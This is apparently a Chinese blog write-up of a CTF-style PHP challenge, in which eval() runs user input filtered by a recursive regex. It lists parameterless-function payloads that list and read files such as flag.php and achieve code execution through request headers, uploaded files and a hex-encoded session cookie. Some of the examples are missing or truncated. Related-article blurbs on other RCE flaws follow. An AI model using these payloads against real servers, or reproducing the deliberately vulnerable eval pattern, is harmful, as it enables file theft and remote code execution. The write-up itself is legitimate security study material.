RCE漏洞研究

最新推荐文章于 2025-12-13 11:39:09 发布
原创 最新推荐文章于 2025-12-13 11:39:09 发布 · 621 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android

<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}
?>

代码中:

highlight_file(__FILE__):输出当前文件源码,方便分析。

preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']):匹配并替换掉无参数的函数调用,确保 $_GET['code'] 仅剩 keval($_GET['code']):执行传入的 code 参数。

正则表达式解析:
[^\W]+:匹配字母、数字和下划线,即PHP函数名。

\((?R)?\):匹配函数括号内容,允许递归嵌套。

preg_replace():删除匹配到的函数调用,最终仅剩 ; 时才允许 eval() 执行。

无参数文件读取

1. 获取当前目录下的文件

方法一:使用 localeconv()

current(localeconv());

localeconv() 返回本地货币格式,其中 decimal_point 位置通常是 "."

current() 获取数组的第一个元素,即  "."

方法二:使用 chr(46)

chr(46) 直接返回 '.'

print_r(scandir(chr(46)));

但 chr(46) 依然需要 46 这个数字,我们可以绕过:

chr(time() % 256);  // 只要 time() % 256 在46时,就可以返回 "."
方法三:使用 PHP 版本计算

ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))

该方法基于PHP版本(例如 5.5.9):

floor(phpversion()) → 5

sqrt(5) → 2.236

tan(2.236) → -2.185

cosh(-2.185) → 4.501

sinh(4.501) → 45.081

ceil(45.081) → 46

chr(46) → "."

方法四:使用 crypt() 生成 .

crypt() 可以生成带 . 的哈希:

可以得到

2. 读取当前目录文件

获得目录列表后,我们可以读取文件。假设目标文件是 flag.php,我们需要遍历目录列表并读取它。

方法一:读取最后一个文件

highlight_file(end(scandir(getcwd())));

show_source(end(scandir(getcwd())));

方法二:逆序数组读取

show_source(current(array_reverse(scandir(getcwd()))));

方法三:随机获取文件

show_source(array_rand(array_flip(scandir(getcwd()))));

3. 读取上一级目录文件

方法一:使用 dirname()

print_r(scandir(dirname(getcwd())));

方法二:利用 ".."

next(scandir(getcwd())) 获取 ..

scandir(..) 列出上级目录。

无参数RCE(远程命令执行)

1. 利用 getallheaders()

eval(pos(getallheaders()));

2. 利用 get_defined_vars()

get_defined_vars() 返回所有PHP变量,包括 $_GET$_POST 等:

3. 利用 $_FILES

上传任意文件:因为 $_FILES 在 get_defined_vars() 结果的最后一项,我们用 end() 取出,再 pos(pos()) 获取文件名,最终执行代码。

4. 利用 session_id()
eval(hex2bin(session_id(session_start())));
我们可以通过 Cookie 传入 session_id:

Cookie: PHPSESSID=706870696e666f28293b
hex2bin() 解码成:

phpinfo();
最终 eval() 执行 phpinfo()。

Apparating
关注
YzmCMS 7.0任意函数调用RCE 漏洞研究分析
shelter1234567的博客
05-07 4172
YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。YzmCMS某些接口调用了 db_pdo类的where方法 导致了远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统指令,写入后门文件,最终可获取服务器权限。
RCE漏洞详解
2402_86373248的博客
05-06 635
定义:远程代码执行(Remote Code Execution,RCE漏洞允许攻击者通过构造恶意输入,在目标服务器或应用程序上执行任意命令或代码。- 危害:可导致服务器完全失陷、数据泄露、内网横向渗透、恶意软件植入等,是最高危的漏洞类型之一。
RCE漏洞基础初了解
m0_68976043的博客
08-12 874
所谓rce简单来说就是可以执行系统命令的函数,举个例子php。
深入探讨RCE漏洞及其防御策略
swordcloud_xm的博客
07-31 1556
借鉴链接当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
Nacos 202407月RCE漏洞(0day)与复现
分享不一样的技术,与你一起共同成长!
07-31 5712
202407月, 爆出漏洞作者说由于某些原因,特意爆出了Nacos的一个RCE 0day漏洞。Nacos 是一个用于动态服务发现和配置以及服务管理的平台,Derby 是一个轻量级的嵌入式数据库。接口 /nacos/v1/cs/ops/derby 和 /nacos/v1/cs/ops/data/removal 在使用 Derby 数据库作为内置数据源时。用于运维人员进行数据运维和问题排查,在使用 standalone 模式启动 Nacos 时,为了避免因搭建外置数据库而占用额外的资源...
Yapi Mock RCE 漏洞复现分析
灰蜗牛
07-12 2754
Yapi Mock RCE 漏洞复现分析 文章目录Yapi Mock RCE 漏洞复现分析0x01 基本信息0x02 漏洞复现0x03 漏洞分析0x04 威胁排查0x05 缓解措施 0x01 基本信息 漏洞名称 : YAPI远程代码执行漏洞 组件名称 : YAPI 影响范围 : YAPI <= 1.9.2, 漏洞类型 :远程代码执行 利用条件 : ​ 1、用户认证:需要用户认证 ​ 2、触发方式:远程 综合评价 : <综合评定利用难度>:中等,需要用户认证。 <综合评定威胁等级&gt
java rce漏洞原理_JXBrowser JavaScript-Java bridge 中的RCE漏洞
weixin_39789206的博客
02-27 317
文章难易度:★★★文章阅读点/知识点:JXBrowserJavaScript-Java bridge 中的RCE漏洞文章作者:WisFree文章来源:blog.portswigger.net【技术分享】JXBrowser JavaScript-Java bridge 中的RCE漏洞1.png (408.46 KB, 下载次数: 13)2016-12-12 15:42 上传前言我近期正在研究如何使用...
浅析xxl-obj分布式任务调度平台RCE漏洞
道阻且长,行则将至
12-29 7188
XXL-JOB 任务调度中心系统这几年被披露出存在多个后台命令执行漏洞,攻击者可以通过反弹 shell 执行任意命令,获取服务器管理权限。本文来分析、总结下 XXL-JOB 系统历史上几个 RCE 漏洞,为攻防工作积累 RCE 高危漏洞知识库。
GitLab 修复严重的RCE漏洞
smellycat000的专栏
07-04 804
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个严重漏洞,可导致攻击者远程执行代码。该漏洞的编号是CVE-2022-2185。该漏洞的等级为“严重”,出现在GitLab的所有版本中:14.10.5之前的14.0版本、15.0.4之前的15.0版本以及15.1.1之前的15.1版本。GitLab 在一份安全公告中指出,认证用户可导入恶意构造的项目...
GitLab修复GitHub import函数中的RCE漏洞
smellycat000的专栏
10-14 568
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士摘要GitLab 中存在一个漏洞,可导致攻击者对GitLab服务器发动多种攻击,包括托管在云上的GitLab.com平台。该漏洞的编号是CVE-2022-2884,CVSS评分为9.9。该漏洞由安全研究员 “yvvdwf” 报告,是因为GitLab 从GitHub 导入数据的方式不正确造成的,可被用于在主机服务器上运行命令。01不安全的impor...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析 ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE...
深入解析RCE漏洞挖掘与利用:涵盖多种技术手段及应用场景.pdf
05-04
适合人群:具备一定安全知识背景的安全研究人员、渗透测试员、网络安全工程师,特别是对RCE漏洞挖掘和利用感兴趣的从业者。 使用场景及目标:①帮助读者理解RCE漏洞的原理及其在不同环境下的利用方式;②提供实际...
20251211给飞凌OK3588-C开发板跑飞凌Android14时让OV5645摄像头以1080p录像
南岭笑笑生之家
12-11 636
本文记录了在飞凌OK3588-C开发板上修改Android14系统配置,使OV5645摄像头支持1080p录像的过程。首先通过source命令初始化编译环境,选择ok3588_c-userdebug构建目标,执行make install clean清理后运行build.sh脚本。关键修改在于media_profiles_V1_0.xml配置文件,将其从默认480p调整为1080p分辨率。操作步骤包括:定位/vendor/etc目录下的配置文件,确认摄像头支持更高分辨率后修改对应参数,最终通过重启验证修改效果
Android FrameWork】第二十八天:Activity 的 UI 绘制全过程
u012739527的博客
12-11 839
Activity → PhoneWindow → DecorView → ContentParent → 开发者布局(如 R.layout.activity_main),形成 “Activity - 窗口 - 根视图 - 自定义布局” 的四层 UI 载体结构,为后续绘制奠定基础。载体初始化:Activity 创建时初始化 PhoneWindow,PhoneWindow 创建 DecorView 并确定 ContentParent。布局加载。
android 为什么revoke权限会杀进程,grant 权限不会杀进程
fuyinghaha的专栏
12-10 52
Android对权限授予和撤销采取不同处理:授予权限时保持进程运行以保障兼容性和用户体验,应用可通过回调处理新权限;而撤销权限时强制终止进程,确保立即切断访问能力,防止数据泄露并重置应用状态。这种差异设计既遵循安全原则,又优化了使用体验,通过实时权限检查、组件生命周期管理等机制实现平衡。
Android FrameWork】延伸阅读:Activity生命周期
u012739527的博客
12-08 953
本文详细介绍了Android中Activity生命周期回调的实现方式,包括核心回调方法的作用、执行顺序和具体实现。主要内容涵盖: 生命周期回调的基础认知:系统通过回调机制管理Activity的创建、可见性和交互状态三个阶段 核心回调方法实现: onCreate():初始化资源和界面 onStart()/onStop():处理可见性变化 onResume()/onPause():管理交互状态 onDestroy():释放资源 状态保存与恢复方法 提供了Kotlin和Java两种语言的完整实现示例,包含日志记录
android15 休眠唤醒过程中有时候屏幕显示时间一闪而过
大小白
12-10 338
摘要:针对Android15开发中默认关闭锁屏后休眠唤醒时屏幕闪烁的问题,可通过代码设置默认关闭"收到通知时唤醒屏幕"选项。解决方案是在SettingsApplication.java的onCreate()方法中添加Settings.Secure.putInt(getContentResolver(), DOZE_ENABLED, 0)代码,该设置会禁用屏幕唤醒功能,从而避免闪烁现象。这种方法比手动在设置界面关闭该选项更高效,实现了系统级的默认配置。
Qt ---- Qt6.5.3 连接MySQL数据库
m0_72753035的博客
12-13 460
编译文件夹的路径为 : \Qt\6.5.3\Src\qtbase\src\plugins\sqldrivers\build\Desktop_Qt_6_5_3_MinGW_64_bit-Debug\plugins\sqldrivers。将这些文件复制粘贴到 Qt\6.5.3\mingw_64\plugins\sqldrivers 中以及 Qt\Tools\QtCreator\bin\plugins\sqldrivers 中。首先我们需要下载mysql数据库,此文章不展示如何下载mysql数据库。
3.MySQL 数据库集成
最新发布
m0_71207979的博客
12-13 657
一个库里有多个表,每个表存一类数据(比如 “超市数据” 库里有:✅ 会员表(存会员 ID、姓名、电话);一个 MySQL 里可以建多个 “库”,每个库对应一个业务(比如 “超市数据” 库、“员工考勤” 库),互相隔离;SQL(结构化查询语言)是和 MySQL 对话的 “语言”,你输入指令,MySQL 执行对应的操作(增 / 删 / 改 / 查数据)。为了区分每一行数据,给表指定一个 “唯一标识字段”(比如会员表的 “ID”),保证每行都不一样(不会有两个 ID=1 的张三)。
rce漏洞复现
03-28
对具体漏洞的工作机制进行深入研究。比如 CVE-2020-0796 是由于 SMB 协议处理不当引起的 RCE 漏洞,了解其触发条件至关重要[^2]。 4. **编写利用脚本** 根据漏洞特性设计相应的 Payload 或 Exploit 脚本来实现...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值